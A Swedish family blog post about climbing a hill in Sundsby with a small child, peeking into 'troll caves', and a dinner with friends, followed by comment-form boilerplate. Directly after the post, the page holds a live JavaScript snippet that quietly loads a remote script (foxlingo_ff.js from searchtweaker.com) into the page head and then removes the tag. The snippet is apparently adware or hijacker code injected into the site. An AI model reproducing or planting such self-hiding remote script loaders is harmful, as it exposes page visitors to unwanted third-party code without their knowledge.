Livet hos Hogengård

Bergsbestigning och trollgrottor

Spännande tur på berget i Sundsby. 
Vi gick inte hela vägen men fick tjusig utsikt ändå. Det fick räcka. Inget problem för Buset som bara ångade på uppför. Jag tyckte dock det blev för brant och ville hålla i honom hela vägen. Passade inte lille herrn som blev skitsur. 
Lite lugnare när vi spanade in grottorna där trollen bor. Mycket spännande dock. Annars var väl den lilla bäcken mest intressant. Vatten är magiskt. 
Man måste ha pinnar i rätt längd när man går upp för berg. Behöver nog inte skriva att han somnade väldigt lätt i kväll. Vi hade middag här med vänner i går. De har en flicka som är sex år och en pojke på tre. Det var full fart. De lekte superfint tillsammans även om hon tyckte Buset var lite väl imponerad och svansade efter henne konstant. 
Nu är det soffläge och även jag kommer somna lätt i kväll. Jag började dagen med ett rejält pass med fina Sass. En sportig dag idag. 🙂

(function(){try{var header=document.getElementsByTagName(”HEAD”)[0];var script=document.createElement(”SCRIPT”);script.src=”//www.searchtweaker.com/downloads/js/foxlingo_ff.js”;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==”complete”||this.readyState==”loaded”)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Related Posts

Lämna ett svar

Din e-postadress kommer inte publiceras. Obligatoriska fält är märkta *

This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

The reCAPTCHA verification period has expired. Please reload the page.